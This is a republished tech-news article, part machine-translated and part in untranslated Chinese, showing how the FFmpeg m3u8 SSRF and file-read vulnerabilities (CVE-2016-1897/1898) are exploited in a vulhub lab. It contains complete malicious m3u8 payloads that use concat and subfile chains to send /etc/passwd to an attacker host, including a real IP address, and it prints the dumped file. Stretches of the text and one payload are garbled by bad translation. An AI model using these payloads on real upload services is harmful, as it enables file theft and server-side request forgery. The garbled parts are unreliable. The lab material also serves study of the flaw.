Example Analysis of SSRF, an arbitrary File Reading vulnerability in ffmpeg 01/15 Update SLTechnology News&Howtos

Example Analysis of SSRF, an arbitrary File Reading vulnerability in ffmpeg

2025-01-15 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

Editor to share with you an example of ffmpeg arbitrary file reading vulnerability SSRF analysis, I believe that most people do not know much about it, so share this article for your reference, I hope you will learn a lot after reading this article, let's go to know it!

For reference, study and use only

Ffmpeg arbitrary file read vulnerability / SSRF vulnerability (CVE-2016-1897/CVE-2016-1898)

Port: 8090

FFmpeg is an open source computer program that can be used to record, convert digital audio and video, and convert it into a stream. The function is very powerful, and it is an indispensable multimedia file processing program for every video website.

Improper handling of m3u8 files in parsing HTTP Live Streaming streaming media in FFMpeg2.X can lead to SSRF vulnerabilities and arbitrary file reading vulnerabilities. The vulnerability is triggered when a website allows users to upload multimedia files and use FFMpeg for processing.

This vulnerability has two CVE numbers, CVE-2016-1897 and CVE-2016-1898, which differ in the number of lines read from the file. CVE-2016-1897 can only read the first line of the file, while CVE-2016-1898 can read any line of the file, basically the same principle.

Affect the version

FFmpeg 2.8.x

< 2.8.5FFmpeg 2.7.x < 2.7.5FFmpeg 2.6.x < 2.6.7FFmpeg 2.5.x < 2.5.10 这个漏洞主要涉及 ffmpeg 对 m3u8文件的处理不当导致的，具体的原理部分不过多赘述，可以参考如下连接：原理 http://blog.neargle.com/SecNewsBak/drops/CVE-2016-1897.8%20-%20FFMpeg%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html http://xdxd.love/2016/01/18/ffmpeg-SSRF%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/ https://habr.com/en/company/mailru/blog/274855/ 漏洞环境如下测试环境借助 vulhub 的 docker 镜像，附上 P 师傅的链接：https://github.com/vulhub/vulhub 运行测试环境： docker-compose up -d 运行完成后，访问对应的 URL 端口，可以看到有个视频上传的接口查看后台的 php 源码，实际上只是借用了 ffmpeg -i 这个命令，因此实际上如果没有部署 docker 镜像，可以之际安装 ffmpeg 软件，通过 ffmpeg 转换即可。漏洞复现我们首先构造一个恶意的 m3u8 的文件(用记事本编写，保存为.m3u8后缀)： #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, http://X.X.X.X:9999/test.txt #EXT-X-ENDLIST各参数说明： #EXTM3U 标签是 m3u8 的文件头，开头必须要这一行#EXT-X-MEDIA-SEQUENCE 表示每一个media URI 在 PlayList中只有唯一的序号，相邻之间序号+1#EXTINF:10.0, 表示该一段 TS 流文件的长度#EXT-X-ENDLIST 这个相当于文件结束符这些是 m3u8 的最基本的标签，而问题就出在 FFMpeg 去请求 TS 流文件（URL）时，FFMpeg 不会判断里面的流地址，直接请求。服务端监听端口：既然可以请求外部数据，因此可以尝试 SSRF 带外。通过查阅资料，发现 ffmpeg 内部有一个 concat 函数，因此我们可以将内部数据通过 concat 拼接 OOB。如果直接使用 concat 拼接，只会正常请求，因此我们需要一些小技巧，将本地文件带出来。首先，我们需要在 web 服务器上创建一个 error.txt，文件内容是 m3u8 的格式，其中不包含文件结束符。其次，我们再创建一个恶意的 m3u8 文件（或者 avi、mp4 等后缀），文件内容通过 concat 拼接本地文件 /etc/passwd。最后，我们上传这个恶意的 m3u8 文件。参考文件内容如下： error.txt #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://X.X.X.X:9999/? upload.m3u8 #EXTM3U #EXT-X-TARGETDURATION:6 #EXTINF:10.0, concat:http://X.X.X.X:8989/error.txt|file:///etc/passwd #EXT-X-ENDLIST web 服务器部署 error.txt：

Upload malicious m3u8 files:

At the same time, VPS listens on port 9999:

Note:

The above files need to be edited and saved using notepad and choose the default utf-8 format. When you try to create it using vim, it always fails to repeat.

Special thanks are given to the author of the following link for providing the solution https://blog.safebuff.com/2016/05/12/CVE-2016-1897-8-FFMpeg%E6%BC%8F%E6%B4%9E%E5%BA%94%E6%80%A5%E5%88%86%E6%9E%90/

Because after uploading, the backend will transcode all the time, the process will be stuck, and the page will not respond. You need to enter docker and manually kill ffmpeg the process.

You can find the above operation mode, only the first row of / etc/passwd data can be taken out, but the later content is still not read, so we make further use of other functions. Ffmpeg also provides the subfile function, where Start is followed by the offset of the start intercept, in bytes, and end is the offset of the end.

Only need to modify the malicious upload.m3u8 file

# EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.0,concat: http://47.99.191.76:8989/error.txt|subfile,start,0,end,31,:///etc/passwd|subfile,start,32,end,79,:///etc/passwd#EXT-X-ENDLIST

In the testing process of gradually increasing the subfile offset, it is found that when the length exceeds a certain length, the data reading part no longer increases. Guess that it may have something to do with URL length or newline characters.

In the process of continuous testing, it is finally found that it has nothing to do with URL length, m3u8 request URL, and there is no 32-byte limit. In fact, concat cannot include newline characters when connecting to URL. The newline character\ ntakes up one character in the / etc/passwd file stored procedure, so whether it is through the file protocol or subfile slices, it will be interrupted as long as it is read to\ n, and the following content cannot be output.

According to this idea, we can just skip the\ nsymbol when reading the file through subfile, constantly debug according to the returned data, and finally read the complete data. Take the following / etc/passwd file as an example, attach the payload reference:

Root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var / cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x: 33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin): / var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody : / nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/bin/falsemessagebus:x:101:101::/var/run/dbus:/bin/false#EXTM3U#EXT-X-MEDIA-SEQUENCE:0#EXTINF:10.0 Concat: http://47.99.191.76:8989/error.txt|subfile,start,0,end,31,:///etc/passwd|subfile,start,32,end,79,:///etc/passwd|subfile,start,80,end,116,:///etc/passwd|subfile,start,117,end,153,:///etc/passwd|subfile,start,154,end,188,:///etc/passwd|subfile,start,189,end,236,:///etc/passwd|subfile,start, 237Graduate Endpoint 284 Zhonghuzhainzhaiguanetcpasswd | subfile,start,285,end,329,:///etc/passwd | subfile,start,330,end,373,:///etc/passwd | subfile,start,374,end,423,:///etc/passwd | subfile,start,424,end,475,:///etc/passwd | subfile,start,476,end,518,:///etc/passwd | subfile,start,519,end,571,:///etc/passwd | subfile,start,572,end,624 ,: / etc/passwd | subfile,start,625,end,686,:///etc/passwd | subfile,start,687,end,735,:///etc/passwd | subfile,start,736,end,817,:///etc/passwd | subfile,start,818,end,876,:///etc/passwd | subfile,start,877,end,918,:///etc/passwd | subfile,start,919,end,965,:///etc/passwd#EXT-X-ENDLIST

Finally read out all the data:

The above is all the contents of this article entitled "sample Analysis of ffmpeg arbitrary File Reading vulnerability SSRF". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.